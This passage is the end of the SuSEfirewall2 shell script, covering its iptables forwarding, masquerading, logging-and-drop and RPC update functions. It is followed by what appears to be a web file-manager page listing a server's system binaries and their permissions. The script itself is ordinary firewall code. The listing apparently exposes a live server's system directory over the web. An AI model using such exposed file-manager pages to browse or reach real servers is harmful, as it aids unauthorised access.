ESTABLISHED,RELATED -p icmp --icmp-type $itype $IPTABLES -A $chain -j "$ACCEPT" -m conntrack --ctstate ESTABLISHED,RELATED -p icmp --icmp-type $itype done for itype in $safe_icmpv6_replies; do $LAA $IP6TABLES -A $chain ${LOG}"-`rulelog $chain`-FWD-RELA " -m conntrack --ctstate ESTABLISHED,RELATED -p icmpv6 --icmpv6-type $itype $IP6TABLES -A $chain -j "$ACCEPT" -m conntrack --ctstate ESTABLISHED,RELATED -p icmpv6 --icmpv6-type $itype done done } # <source network>,<destination network>[,protocol[,port[,flags]]] forwarding_rules() { local nets net1 net2 flags more_args_in more_args_out chain iptables var services local zone zonein zoneout local target="$1" if [ "$target" = ACCEPT ]; then var="FW_FORWARD" else var="FW_FORWARD_${target}" fi eval services="\"\$$var\"" for nets in $services; do IFS=, eval set -- \$nets net1="$1" net2="$2" proto="$3" port="$4" shift; shift; shift; shift rport="" more_args_in= more_args_out= zonein= zoneout= while [ "$#" -gt 0 ]; do case "$1" in ipsec) more_args_in="$IPSEC_INPUT_MATCH" more_args_out="$IPSEC_OUTPUT_MATCH" ;; zonein=*) zonein="${1#*=}" ;; zoneout=*) zoneout="${1#*=}" ;; *) error "unknown parameter $1 in FW_FORWARD -> $1"; net1= ;; esac shift done if ! check_proto_port "$proto" "$port" '' "FW_FORWARD"; then continue fi if [ -n "$net1" -a -n "$net2" ]; then if [ "${net1//:/_}" != "$net1" -o "${net2//:/_}" != "$net2" ]; then iptables=$IP6TABLES else iptables=$IPTABLES fi for zone in $forward_zones; do chain=forward_$zone set -- $iptables -A $chain $proto $more_args_in if [ -z "$zonein" -o "$zonein" = "$zone" ]; then if [ -n "$zoneout" ]; then create_cond_chain "$target" "out" "$zoneout" jt=${target}_if_out_$zoneout else jt="$target" fi $LAC "$@" -s $net1 -d $net2 ${LOG}"-`rulelog $chain`-${target:0:3}-FORW " $port -m conntrack --ctstate NEW $more_args_in $LAA "$@" -s $net1 -d $net2 ${LOG}"-`rulelog $chain`-${target:0:3}-FORW " $port $more_args_in "$@" -s $net1 -d $net2 -j "$jt" -m conntrack --ctstate NEW,ESTABLISHED,RELATED $port fi if [ -z "$zoneout" -o "$zoneout" = "$zone" ]; then if [ -n "$zonein" ]; then create_cond_chain "$target" "out" "$zonein" jt=${target}_if_out_$zonein else jt="$target" fi "$@" -s $net2 -d $net1 -j "$jt" -m conntrack --ctstate ESTABLISHED,RELATED $rport fi if [ -n "$more_args_out" ]; then if [ -z "$zonein" -o "$zonein" = "$zone" ]; then $LAC $iptables -A $chain ${LOG}"-`rulelog $chain`-${target:0:3}-FORW " -s $net1 -d $net2 $proto $port -m conntrack --ctstate NEW $more_args_out $LAA $iptables -A $chain ${LOG}"-`rulelog $chain`-${target:0:3}-FORW " -s $net1 -d $net2 $proto $port $more_args_out fi if [ -z "$zoneout" -o "$zoneout" = "$zone" ]; then $iptables -A $chain -j "$target" -m conntrack --ctstate NEW,ESTABLISHED,RELATED -s $net1 -d $net2 $proto $port $more_args_out $iptables -A $chain -j "$target" -m conntrack --ctstate ESTABLISHED,RELATED -s $net2 -d $net1 $proto $rport $more_args_out fi fi done else error "too few parameters in $var -> $nets" fi done } masquerading_rules() { local nets proto port dev sport local net1 net1_neg net1_src net1_dst local net2 net2_neg net2_src net2_dst local szone dzone sdev sdevs local z d local var='FW_NOMASQ_NETS' for nets in $FW_NOMASQ_NETS -- $FW_MASQ_NETS; do if [ "$nets" = '--' ]; then # cheap hack var='FW_MASQ_NETS' continue fi IFS=, eval set -- \$nets net1="$1" net2="$2" proto="$3" port="$4" rport="" if [ -n "$5" ]; then error "Too many arguments in $var -> $nets" elif [ -z "$net1" ]; then error "source network must not be empty in $var -> $nets" elif check_proto_port "$proto" "$port" '' "$var"; then eval `net2srcdst net1 "$net1"` eval `net2srcdst net2 "$net2"` for dev in $FW_MASQ_DEV; do d=${dev//[^A-Za-z0-9]/_} eval z=\${iface_$d} if [ "$var" = "FW_NOMASQ_NETS" ]; then # cheap hack $IPTABLES -A POSTROUTING -j ACCEPT -t nat $net1_src $net2_dst $proto $port -o $dev continue fi for dzone in $forward_zones; do dzone=forward_$dzone for szone in $forward_zones; do [ "$z" = "$szone" ] && continue eval sdevs="\$FW_DEV_$szone" for sdev in $sdevs; do [ "$sdev" = "$dev" ] && continue if [ "forward_$z" != "$dzone" ]; then #echo "$dzone: $sdev ($szone) -> $dev ($z)" $LAA $IPTABLES -A $dzone ${LOG}"-`rulelog $dzone`-ACC-MASQ " $net1_src $net2_dst $proto $port -i $sdev -o $dev $IPTABLES -A $dzone -j "$ACCEPT" -m conntrack --ctstate NEW,ESTABLISHED,RELATED $net1_src $net2_dst $proto $port -i $sdev -o $dev else #echo "$dzone: $sdev ($szone) <- $dev ($z)" # we need to allow the replies as well $LAA $IPTABLES -A $dzone $net1_dst $net2_src $proto $rport -i $dev -o $sdev ${LOG}"-`rulelog $dzone`-ACC-MASQ " -m conntrack --ctstate ESTABLISHED,RELATED $IPTABLES -A $dzone $net1_dst $net2_src $proto $rport -i $dev -o $sdev -j "$ACCEPT" -m conntrack --ctstate ESTABLISHED,RELATED fi done done done $IPTABLES -A POSTROUTING -j MASQUERADE -t nat $net1_src $net2_dst $proto $port -o $dev done fi done } # <source network>,<ip to forward to>,<protocol>,<port>[,redirect port,[destination ip]] # XXX: really stupid syntax. That one would be more obvious: # <source network>,<destination>,<protocol>,<port>,<ip to forward to>,<redirect port> forward_masquerading_rules() { local nets proto port1 port2 lip local net1 net1_neg net1_src net1_dst local net2 net2_neg net2_src net2_dst for nets in $FW_FORWARD_MASQ; do IFS=, eval set -- \$nets net1="$1" target="$2" proto="$3" port1="$4" port2="$5" net2="$6" case "$target" in */*|\!*|'') error "target must be a single host in FW_FORWARD_MASQ -> $nets" continue ;; esac if [ -n "$7" ]; then error "too many arguments in FW_FORWARD_MASQ -> $nets" elif [ -z "$net1" ]; then error "source network must not be empty in FW_FORWARD_MASQ -> $nets" elif [ "$proto" != tcp -a "$proto" != udp ]; then error "The protocol with FW_FORWARD_MASQ must be tcp or udp -> $nets" elif [ -z "$port1" ]; then error "Port missing in FW_FORWARD_MASQ -> $nets" else eval `net2srcdst net1 "$net1"` eval `net2srcdst net2 "$net2"` eval `net2srcdst target "$target"` proto="-p $proto" test -z "$port2" && port2="$port1" port1="--dport $port1" dport2="--dport $port2" port2=":${port2/:/-}" for dev in $FW_MASQ_DEV; do $IPTABLES -A PREROUTING -j DNAT -t nat $proto $net1_src $net2_dst $port1 --to-destination ${target}${port2} -i $dev # to install minimal rule set we'd need to check if # $net1 is covered by $FW_MASQ_NETS. Not feasible in # bash code so just check for 0/0 if [ "$FW_MASQ_NETS" != "0/0" ]; then $IPTABLES -A POSTROUTING -j MASQUERADE -t nat $net1_src $net2_dst $proto $dport2 -o $dev fi done for chain in $forward_zones; do chain=forward_$chain $LAC $IPTABLES -A $chain ${LOG}"-`rulelog $chain`-ACC-REVMASQ " $proto $net1_src $target_dst $dport2 -m conntrack --ctstate NEW $LAA $IPTABLES -A $chain ${LOG}"-`rulelog $chain`-ACC-REVMASQ " $proto $net1_src $target_dst $dport2 $IPTABLES -A $chain -j "$ACCEPT" $proto $net1_src $target_dst $dport2 $IPTABLES -A $chain -j "$ACCEPT" $proto $net1_dst $target_src -m conntrack --ctstate ESTABLISHED,RELATED done fi done } # Special Logging + Deny # drop_all() { local chain local zone local drop local comment comment_pars "insert.pos" for iptables in $IPTABLES_LIST; do local icmp_type=icmp local chainprefix='input_' [ $iptables = $IP6TABLES ] && icmp_type=icmpv6 for zone in $input_zones '--' $forward_zones; do if [ "$zone" = '--' ]; then [ "$FW_ROUTE" != 'yes' ] && break chainprefix='forward_' continue fi chain="$chainprefix$zone" eval drop="\$FW_REJECT_`cibiz $zone`" if [ "$drop" = "yes" ]; then drop="$REJECT" else drop="$DROP" fi eval local ignore="\$FW_IGNORE_FW_BROADCAST_`cibiz $zone`" # log and drop broadcast/multicast packets separately, only if not # ignored, to not flood other log targets (#155326, #538053, #847193) # the $comment added here is a marker that helps us to # find the right insert position for incremental rule # additions in update-rpc mode. We can't simply append # the incremental rules, because we have general DROP # statements at the end, but also should't simply # prepend incremental rules, because we have some DROP # statements at the beginning like DROP broadcast in # the INPUT chain. This here should be a good spot, # after the initial DROP statements but before the # final ones. if [ "$ignore" != 'yes' ]; then $LDA $iptables -A $chain $comment ${LOG}"-`rulelog $chain`-DROP-DEFLT " -m pkttype \! --pkt-type unicast fi $iptables -A $chain $comment -j "$DROP" -m pkttype \! --pkt-type unicast # some packet types are considered critical if [ -z "$LDC" ]; then local log=${LOG}"-`rulelog $chain`-DROP-DEFLT" $iptables -A $chain $log" " -p tcp --syn $iptables -A $chain $log" " -p ${icmp_type} $iptables -A $chain $log" " -p udp -m conntrack --ctstate NEW fi # log anything else $LDA $iptables -A $chain ${LOG}"-`rulelog $chain`-DROP-DEFLT " $iptables -A $chain -j "$drop" done done } # bnc#1069760 # in some circumstances like with rpc service rules for portmapper # port 111 we can end up with duplicate rules in the rule set. It's # difficult to avoid setting them in the first place due to # customizations by users, different packages dropping rpc service # files not according to standard (specifying portmap instead of portmapper), # therefore we're implicitly adding portmapper for each rpc service setup ... # # so this is not elegant but involves the smallest risk of breaking # something: iterate over the rules we've set know and remove unneeded # ones function erase_duplicates { for zone in $all_zones; do for chain in input forward; do chain="${chain}_${zone}" # use _BIN variants here, to avoid iptables-batch # getting in our way for iptables in $IPTABLES_BIN $IP6TABLES_BIN; do erase_duplicates_in_chain "$iptables" "$chain" done done done } function erase_duplicates_in_chain { local iptables="$1" local chain="$2" [ -z "$chain" -o -z "$iptables" ] && return 1 # keep track of duplicate rules via an associative array declare -A ruleset declare -A rulemap local ORIG_IFS="$IFS" local replace='s/-m comment --comment "[^"]\+" //g' local rulenum=1 local dups="" local rule # - tail: ignore the first rule (chain creation rule, not counted) # - sed: cut out the comments from the rules, because equal rules # can have different comments for the update-rpc logic IFS=$'\n'; for rule in `$iptables -S "$chain" | /usr/bin/tail -n +2 | /usr/bin/sed $replace`; do if [ ${ruleset[$rule]+abc} ]; then # it's important to put higher numbers first, because # otherwise we'll screw up order upon delete dups="$rulenum $dups" else ruleset[$rule]=true fi rulemap[$rulenum]=$rule rulenum=$(($rulenum + 1)) done IFS="$ORIG_IFS" for rulenum in $dups; do rule=${rulemap[$rulenum]} tracemessage "Removing duplicate rule nr. $rulenum from $chain: $rule" $iptables -D "$chain" $rulenum done } # perform some final actions after all rules have been setup function fw_after_finished { erase_duplicates # check whether libvirtd is running and trigger it to reinstate # firewall rules, if necessary. See bsc#884398 /bin/systemctl --quiet is-active libvirtd || return # this only affects virtual networks (NAT) created by libvirt. The # default.xml example network provided by libvirt does create such # rules. You don't even need a VM for this, you just need to create # the network in virsh, see here # https://wiki.libvirt.org/page/Networking#NAT_forwarding_.28aka_.22virtual_networks.22.29 # this signal tells libvirtd to reinstate its firewall rules for # active VMs /usr/bin/killall -HUP libvirtd # sadly libvirtd may require but not doesn't restore ip_forwarding, so # we don't rightly know whether this is necessary at this stage # # we remembered the old value in switch_on_ip_forwarding an restore it # here, if it was on before if [ "$FW_ROUTE" != "yes" -a "$orig_ipv4_forwarding" -eq 1 ]; then switch_on_ip_forwarding "yes" fi } # reads in all config files, prepares script state for further activity function init_configuration() { parse_zones parse_interfaces check_interfaces_unique autodetect_interfaces write_status process_masq_dev load_customrules check_interfaces verify_parameters #verify_masq_nets parse_ipsec remove_unused_zones [ "$FW_ROUTE" != 'no' ] && forward_zones="$all_zones" input_zones="$all_zones" saved_input_zones="$input_zones" # need that for fork_to_chains parse_configurations } # removes all rules from the separate sfw2 chains that match the given comment # string # $1: the comment string to use for finding matching rules. This may also # contain grep regular expression wildcards to selecting multiple groups of # comments function remove_matching_rules() { local id comment_id "$1" # there are different approaches to remove inidividual rules again. # the default is that we'd need to specify the complete rule to # iptables -D, which is pretty cumbersome. An alternative is to # specify the rule number in the chain, that we want to delete # the rule number is not fixed, when removing a rule in the middle # then the numbers of all following rules change. thus it also isn't # race free if multiple programs modify the tables. This is true for # many things regarding iptables, however. # we use the rule number approach here. # iptables -L --line shows the rule numbers, however for all chains. # this is difficult to process for us. # iptables -S shows the rules from a given chain, but doesn't support # the --line parameter >:-( # - the first rule from iptables -S is to be ignored (it's the chain # creation rule). # - cat prints us the numbers # - grep filters the rules we want # - ... and extracts the rule numbers # - tac reverses the numbers so we start with the highest # rule numbers first, to prevent the renumbering of rules hitting # us. for zone in $all_zones; do for chain in input forward; do chain="${chain}_${zone}" # use IPTABLES_BIN here, to avoid iptables-batch # handling that breaks when we want to parse the # iptables output, or calculate rule numbers in # get_rpc_insert_pars for rulenr in `$IPTABLES_BIN -S $chain | /usr/bin/tail -n +2 | /usr/bin/cat -n | /usr/bin/grep "\"$id\"" | /usr/bin/grep -o '^[[:space:]]*[0-9]\+' | /usr/bin/tac`; do $IPTABLES_BIN -D $chain $rulenr done done done } # called in update-rpc mode: # - remove any currently active rules for the selected rpc services # - reinstate the rules based on updated port mapper information # $1: the rpc_service to update, or empty for all services currently # configured function update_rpc() { local service="$1" local pattern="$service" # wildcard all rpc comments if no special service is selected [ -z "$pattern" ] && pattern='[^"]\+' remove_matching_rules "rpc.$pattern" # necessary to reduce the input_zones to the necessary amount protect_from_internal "update-rpc" local action for action in DROP REJECT; do reject_or_drop_services $action "update-rpc" $service done # don't add the portmapper rules if we're doing a selective rpc # service update and the rules are already in place # - except if the service is the portmapper itself, in which case we # want to process it, of course local add_portmapper=true if [ -n "$service" -a "$service" != "portmapper" ]; then local id comment_id "rpc.portmapper" $IPTABLES_BIN -L | grep -q "$id" [ $? -eq 0 ] && add_portmapper=false fi add_portmapper=$add_portmapper update_rpc=true allow_rpc_services $service accept_services "update-rpc" $service [ -n "$USE_IPTABLES_BATCH" ] && commit_iptables_batch } ############################################ # # # Now we begin to set the filter rules ... # # # ############################################ if [ "$ACTION" = "showlog" ]; then exec perl "$SCRIPTSDIR/SuSEfirewall2-showlog" "$@" die 1 "failed to execute $SCRIPTSDIR/SuSEfirewall2-showlog" fi ############### setlock if [ "$ACTION" = "bootlock" -o "$ACTION" = "bootunlock" ]; then # lock file already set in setlock die 0 fi if [ "$MODE" = "test" ]; then DROP="ACCEPT" REJECT="ACCEPT" FW_LOG_DROP_ALL=yes FW_LOG_DROP_CRIT=yes FW_LOG_ACCEPT_ALL=no FW_LOG_ACCEPT_CRIT=no warning "SuSEfirewall2 is running in TEST MODE, no packet filtering is done!" fi parse_logging if [ "$ACTION" = "basic" ]; then # Reset the filter rules set_basic_rules $IPTABLES -A INPUT -j "$ACCEPT" -p icmp --icmp-type echo-request # log incoming tcp connection requests. also logging udp etc would just flood the log $IPTABLES -A INPUT -p tcp -m conntrack --ctstate NEW $LOG"-IN-DROP-NEW-CONNECT " # reject anything else $IPTABLES -A INPUT -j "$DROP" [ -n "$USE_IPTABLES_BATCH" ] && commit_iptables_batch die 0 "Firewall rules successfully set in simple mode" fi if [ "$ACTION" = "stop" ]; then if [ "$FW_STOP_KEEP_ROUTING_STATE" != "yes" ]; then setproc 0 /proc/sys/net/ipv4/ip_forward fi # Do we have a kernel with IPv6 enabled? $IP6TABLES_BIN -nvL >/dev/null 2>&1 || IP6TABLES=: reset_rules clear_qdisc_settings handle_initscripts rm -rf "$STATUSDIR"/{override,status} [ -n "$USE_IPTABLES_BATCH" ] && commit_iptables_batch die 0 "Firewall rules unloaded." fi if [ "$ACTION" = "close" ]; then set_basic_rules setproc 0 /proc/sys/net/ipv4/ip_forward [ -n "$USE_IPTABLES_BATCH" ] && commit_iptables_batch die 0 "Firewall rules set to CLOSE." fi if [ "$ACTION" = "status" ]; then if [ "$UID" != 0 ]; then die 2 "You need to be root to check the status" fi if ! is_running; then die 1 "SuSEfirewall2 not active" fi [ -z "$quiet" ] || die 0 # yes we need cat here, while read ... does no work :-( for i in `sort < /proc/net/ip_tables_names`; do echo "### iptables $i ###" $IPTABLES -t $i -vnL echo "" done if [ "$IP6TABLES" != ":" ]; then for i in `sort /proc/net/ip6_tables_names`; do echo "### ip6tables $i ###" $IP6TABLES -t $i -vnL echo "" done fi die 0 fi if [ "$ACTION" = "open" ]; then OPENHELPER="$SCRIPTSDIR/SuSEfirewall2-open" exec perl -w $OPENHELPER "$@" die 1 "failed to execute $OPENHELPER" fi if [ "$ACTION" = "update-rpc" ]; then init_configuration if ! is_firewall_running; then die 1 "SuSEfirewall2 is not running, no rpc update possible" else message "Updating rules for ${rpc_service:-every} rpc service" fi update_rpc $rpc_service die 0 fi ### main mode ### message "Setting up rules from $FWCONFIG ..." init_configuration # Set default rules + flush set_basic_rules switch_on_ip_forwarding $FW_ROUTE set_proc_stuff create_chains # HOOK fw_custom_after_chain_creation # HOOK, deprecated fw_custom_before_antispoofing # HOOK, deprecated fw_custom_after_antispoofing protect_from_internal check_convert_old_broadcast drop_broadcast allow_ipsec allow_icmp allow_forward_icmp_echo # HOOK fw_custom_before_port_handling process_trusted_nets if [ "$FW_LEGACY_ACCEPT_FIRST" != 'yes' ]; then reject_or_drop_services DROP reject_or_drop_services REJECT fi allow_related allow_ip_services allow_tcp_services allow_udp_services allow_rpc_services accept_services if [ "$FW_LEGACY_ACCEPT_FIRST" = 'yes' ]; then reject_or_drop_services DROP reject_or_drop_services REJECT fi warn_highports # HOOK fw_custom_before_masq redirect_rules if [ "$FW_ROUTE" = yes ]; then allow_related_forward_icmp allow_class_routing forwarding_rules DROP forwarding_rules REJECT forwarding_rules ACCEPT if [ "$FW_MASQUERADE" = yes ]; then masquerading_rules forward_masquerading_rules fi fi # HOOK fw_custom_before_denyall drop_all fork_to_chains finish_chains # HTB settings if [ -n "$FW_HTB_TUNE_DEV" ]; then need qdisc do_qdisc_settings fi [ -n "$USE_IPTABLES_BATCH" ] && commit_iptables_batch handle_initscripts fw_after_finished # HOOK fw_custom_after_finished # END # die 0 "Firewall rules successfully set" # vim: fo-=t

Filemanager

Name	Type	Size	Permission
Check	File	190 B	0755
OCICLI	File	441 B	0755
OneClickInstallCLI	File	441 B	0755
OneClickInstallUI	File	99 B	0755
OneClickInstallUrlHandler	File	99 B	0755
SUSEConnect	File	637 B	0755
SUSEfirewall2	File	84.6 KB	0755
SuSEfirewall2	File	84.6 KB	0755
accept	File	10.1 KB	0555
accessdb	File	10.63 KB	0755
addgnupghome	File	3.05 KB	0755
addpart	File	22.1 KB	0755
adjtimex	File	43.52 KB	0755
agetty	File	58.19 KB	0755
alternatives	File	42.66 KB	0755
applySystemQuotas.pl	File	3.15 KB	0755
applygnupgdefaults	File	2.21 KB	0755
arpd	File	50.96 KB	0755
arping	File	22.04 KB	0755
atd	File	26.84 KB	0755
atmel_fwl	File	1.67 KB	0755
atrun	File	67 B	0755
audispd	File	38.18 KB	0750
auditctl	File	42.23 KB	0750
auditd	File	110.24 KB	0750
augenrules	File	3.7 KB	0750
aureport	File	98.16 KB	0755
ausearch	File	106.17 KB	0755
automount	File	297.86 KB	0755
autrace	File	14.09 KB	0750
avcstat	File	10.4 KB	0755
badblocks	File	26.66 KB	0755
biosdecode	File	19.02 KB	0755
blkdiscard	File	26.1 KB	0755
blkid	File	102.2 KB	0755
blkmapd	File	26.66 KB	0755
blkzone	File	62.17 KB	0755
blockdev	File	54.17 KB	0755
bmc-snmp-proxy	File	9.91 KB	0755
bridge	File	75.07 KB	0755
btrfs	File	633.27 KB	0755
btrfs-convert	File	352.66 KB	0755
btrfs-debug-tree	File	316.2 KB	0755
btrfs-image	File	340.34 KB	0755
btrfs-show-super	File	316.41 KB	0755
btrfs-zero-log	File	312.16 KB	0755
btrfsck	File	633.27 KB	0755
btrfstune	File	316.16 KB	0755
cache_check	File	1.2 MB	0755
cache_dump	File	1.2 MB	0755
cache_metadata_size	File	1.2 MB	0755
cache_repair	File	1.2 MB	0755
cache_restore	File	1.2 MB	0755
cache_writeback	File	1.2 MB	0755
calc_tickadj	File	2.78 KB	0755
cfdisk	File	90.53 KB	0755
cgdisk	File	167.09 KB	0755
chat	File	26.55 KB	0755
chcpu	File	38.09 KB	0755
check_mail_queue	File	477 B	0755
chpasswd	File	54.94 KB	0755
cifs.idmap	File	14.17 KB	0755
cifs.upcall	File	34.36 KB	0755
clockdiff	File	18.24 KB	0755
config.postfix	File	43.68 KB	0755
convertquota	File	75.8 KB	0755
cracklib-check	File	6.26 KB	0755
cracklib-format	File	218 B	0755
cracklib-packer	File	10.28 KB	0755
cracklib-unpacker	File	6.24 KB	0755
crda	File	18.52 KB	0755
create-cracklib-dict	File	990 B	0755
cron	File	74.82 KB	0755
cryptconfig	File	63.26 KB	0755
cryptsetup	File	91.71 KB	0755
cryptsetup-reencrypt	File	90.3 KB	0755
ctrlaltdel	File	34.1 KB	0755
ctstat	File	18.87 KB	0755
cupsaccept	File	10.1 KB	0555
cupsdisable	File	10.1 KB	0555
cupsenable	File	10.1 KB	0555
cupsreject	File	10.1 KB	0555
ddns-confgen	File	18.5 KB	0755
debugfs	File	187.7 KB	0755
delpart	File	22.1 KB	0755
depmod	File	236.71 KB	0755
devlink	File	50.7 KB	0755
dmidecode	File	82.45 KB	0755
dnssec-checkds	File	922 B	0755
dnssec-coverage	File	924 B	0755
dnssec-dsfromkey	File	55.32 KB	0755
dnssec-importkey	File	55.32 KB	0755
dnssec-keyfromlabel	File	59.27 KB	0755
dnssec-keygen	File	67.27 KB	0755
dnssec-keymgr	File	920 B	0755
dnssec-revoke	File	51.21 KB	0755
dnssec-settime	File	59.26 KB	0755
dnssec-signzone	File	108.13 KB	0755
dnssec-verify	File	51.2 KB	0755
dosfsck	File	54.58 KB	0755
dosfslabel	File	50.57 KB	0755
dumpe2fs	File	26.89 KB	0755
e2freefrag	File	10.39 KB	0755
e2fsck	File	289.48 KB	0755
e2image	File	30.98 KB	0755
e2label	File	99.89 KB	0755
e2undo	File	18.55 KB	0755
e4crypt	File	22.56 KB	0755
e4defrag	File	26.59 KB	0755
edquota	File	84.2 KB	0755
edquota_editor	File	1.21 KB	0755
efibootdump	File	18.56 KB	0755
efibootmgr	File	43.89 KB	0755
era_check	File	1.2 MB	0755
era_dump	File	1.2 MB	0755
era_invalidate	File	1.2 MB	0755
era_restore	File	1.2 MB	0755
ethtool	File	291.43 KB	0755
eventlogadm	File	38.1 KB	0755
exchange-bmc-os-info	File	7.75 KB	0755
exportfs	File	63.13 KB	0755
fatlabel	File	50.57 KB	0755
fatresize	File	10.37 KB	0755
fbtest	File	10.4 KB	0755
fdformat	File	26.1 KB	0755
fdisk	File	134.22 KB	0755
filefrag	File	14.38 KB	0755
findfs	File	10.09 KB	0755
fixmbr	File	10.25 KB	0755
flushb	File	43 B	0755
fping	File	30.63 KB	0755
fping6	File	30.64 KB	0755
fsck	File	46.14 KB	0755
fsck.btrfs	File	1.16 KB	0755
fsck.cramfs	File	34.13 KB	0755
fsck.ext2	File	289.48 KB	0755
fsck.ext3	File	289.48 KB	0755
fsck.ext4	File	289.48 KB	0755
fsck.fat	File	54.58 KB	0755
fsck.minix	File	106.2 KB	0755
fsck.msdos	File	54.58 KB	0755
fsck.vfat	File	54.58 KB	0755
fsfreeze	File	10.09 KB	0755
fstrim	File	58.17 KB	0755
gdisk	File	174.88 KB	0755
genhomedircon	File	23.37 KB	0755
genl	File	54.91 KB	0755
genrandom	File	10.33 KB	0755
getenforce	File	6.23 KB	0755
getsebool	File	10.32 KB	0755
getsysinfo	File	1.66 KB	0755
glibc_post_upgrade	File	732.43 KB	0700
gpm	File	96.21 KB	0755
groupadd	File	53.81 KB	0755
groupdel	File	49.6 KB	0755
groupmod	File	60.13 KB	0755
growpart	File	21.3 KB	0755
grpck	File	45.66 KB	0755
grub2-bios-setup	File	1.03 MB	0755
grub2-check-default	File	2.38 KB	0755
grub2-install	File	1.29 MB	0755
grub2-macbless	File	1.01 MB	0755
grub2-mkconfig	File	8.48 KB	0755
grub2-ofpathname	File	228.11 KB	0755
grub2-once	File	6.98 KB	0755
grub2-probe	File	1.02 MB	0755
grub2-reboot	File	4.01 KB	0755
grub2-set-default	File	3.47 KB	0755
grub2-sparc64-setup	File	1.03 MB	0755
hardlink	File	14.34 KB	0755
haveged	File	18.64 KB	0755
hdparm	File	100.74 KB	0755
hwclock	File	86.3 KB	0755
hwinfo	File	33.91 KB	0755
icmpinfo	File	14.76 KB	0755
iconvconfig	File	30.7 KB	0755
ifdhandler	File	200.66 KB	0755
ifdproxy	File	200.47 KB	0755
ifenslave	File	18.8 KB	0755
ifrename	File	30.55 KB	0755
ifstat	File	42.91 KB	0755
iftop	File	59.66 KB	0755
ifup	File	5.82 KB	0755
in.rdisc	File	22.13 KB	0755
inputattach	File	16.52 KB	0755
insmod	File	236.71 KB	0755
insserv	File	6.06 KB	0755
install_acx100_firmware	File	1.4 KB	0755
install_intersil_firmware	File	1.3 KB	0755
integritysetup	File	44.65 KB	0755
iotop	File	495 B	0755
ip	File	498 KB	0755
ip6tables	File	85.81 KB	0755
ip6tables-batch	File	44.09 KB	0755
ip6tables-restore	File	85.81 KB	0755
ip6tables-save	File	85.81 KB	0755
ipmievd	File	408.33 KB	0755
iptables	File	85.81 KB	0755
iptables-apply	File	3.38 KB	0755
iptables-batch	File	44.09 KB	0755
iptables-restore	File	85.81 KB	0755
iptables-save	File	85.81 KB	0755
irqbalance	File	50.75 KB	0755
isc-hmac-fixup	File	10.4 KB	0755
itox	File	26.46 KB	0755
iwconfig	File	26.48 KB	0755
iwevent	File	18.48 KB	0755
iwgetid	File	14.29 KB	0755
iwlist	File	34.63 KB	0755
iwpriv	File	14.37 KB	0755
iwspy	File	14.32 KB	0755
kbdsettings	File	1.17 KB	0755
kdump	File	10.32 KB	0755
kdumptool	File	520.46 KB	0755
kexec	File	255.5 KB	0755
kexec-bootloader	File	6.2 KB	0755
klogconsole	File	6.28 KB	0744
ldattach	File	30.1 KB	0755
lnstat	File	18.87 KB	0755
load_policy	File	10.3 KB	0755
lockdev	File	10.23 KB	2755
logrotate	File	71.23 KB	0755
logsave	File	10.41 KB	0755
logwatch	File	57.61 KB	0755
losetup	File	98.76 KB	0755
lpadmin	File	26.09 KB	0555
lpc	File	14.15 KB	0555
lpinfo	File	10.09 KB	0555
lpmove	File	10.09 KB	0555
lsmod	File	236.71 KB	0755
lsmsr	File	121.91 KB	0755
lvm	File	2.07 MB	0555
lvmconf	File	12.55 KB	0555
lwepgen	File	10.2 KB	0755
matchpathcon	File	10.36 KB	0755
mcelog	File	143.45 KB	0755
mk_isdnhwdb	File	34.54 KB	0755
mkdict	File	218 B	0755
mkdosfs	File	27.06 KB	0755
mkdumprd	File	7.13 KB	0755
mke2fs	File	120.23 KB	0755
mkfs	File	10.09 KB	0755
mkfs.bfs	File	26.1 KB	0755
mkfs.btrfs	File	332.27 KB	0755
mkfs.cramfs	File	34.11 KB	0755
mkfs.ext2	File	120.23 KB	0755
mkfs.ext3	File	120.23 KB	0755
mkfs.ext4	File	120.23 KB	0755
mkfs.fat	File	27.06 KB	0755
mkfs.minix	File	94.19 KB	0755
mkfs.msdos	File	27.06 KB	0755
mkfs.vfat	File	27.06 KB	0755
mklost+found	File	10.32 KB	0755
mkpostfixcert	File	5.85 KB	0755
mksubvolume	File	67.23 KB	0755
mkswap	File	94.18 KB	0755
modinfo	File	236.71 KB	0755
modprobe	File	236.71 KB	0755
mount.crypt	File	34.98 KB	0755
mount.fuse	File	10.32 KB	0755
mount.vmhgfs	File	42.82 KB	0755
mountstats	File	23.88 KB	0755
mountstats_0_3	File	35.15 KB	0755
mysqld	File	18.61 MB	0755
named-journalprint	File	10.32 KB	0755
netscsid	File	107.96 KB	0555
newusers	File	74.25 KB	0755
nfnl_osf	File	14.4 KB	0755
nfsidmap	File	18.65 KB	0755
nfsiostat	File	23.55 KB	0755
nfsstat	File	29.07 KB	0755
nginx	File	7.94 MB	0755
nologin	File	10.09 KB	0755
nscd	File	152.22 KB	0755
nsec3hash	File	10.31 KB	0755
nstat	File	22.7 KB	0755
ntp-keygen	File	159.73 KB	0755
ntp-wait	File	3.12 KB	0755
ntpd	File	855.16 KB	0755
ntpdate	File	79.23 KB	0755
ntpdc	File	228.16 KB	0755
ntpq	File	270.23 KB	0755
ntptime	File	18.22 KB	0755
ntptrace	File	3.48 KB	0755
one-context-run	File	1.77 KB	0755
one-contextd	File	9.12 KB	0755
open_init_pty	File	10.36 KB	0755
openct-control	File	192.26 KB	0755
ownership	File	10.37 KB	0755
packer	File	10.28 KB	0755
pam-config	File	199.05 KB	0755
parted	File	75.5 KB	0755
partprobe	File	10.37 KB	0755
partx	File	98.5 KB	0755
pcscd	File	115.78 KB	0755
pdata_tools	File	1.2 MB	0755
pivot_root	File	10.1 KB	0755
pluginviewer	File	14.55 KB	0755
plymouth-set-default-theme	File	6.21 KB	0755
plymouthd	File	83.75 KB	0755
pmt-ehd	File	26.88 KB	0755
pmvarrun	File	14.47 KB	0755
postalias	File	18.64 KB	0755
postcat	File	18.61 KB	0755
postconf	File	176.46 KB	0755
postdrop	File	14.73 KB	2755
postfix	File	14.5 KB	0755
postkick	File	10.36 KB	0755
postlock	File	10.41 KB	0755
postlog	File	10.57 KB	0755
postmap	File	18.6 KB	0755
postmulti	File	27.05 KB	0755
postqueue	File	22.75 KB	2755
postsuper	File	23.02 KB	0755
pppd	File	354.42 KB	0755
pppdump	File	47.59 KB	0755
pppoe-discovery	File	18.51 KB	0555
pppstats	File	14.38 KB	0755
pptp	File	59.59 KB	0755
pptp-command	File	22.74 KB	0755
pptpsetup	File	6.84 KB	0755
pwck	File	50.81 KB	0755
pwconv	File	46.66 KB	0755
pwunconv	File	37.28 KB	0755
qmqp-source	File	18.65 KB	0755
quota_nld	File	79.86 KB	0755
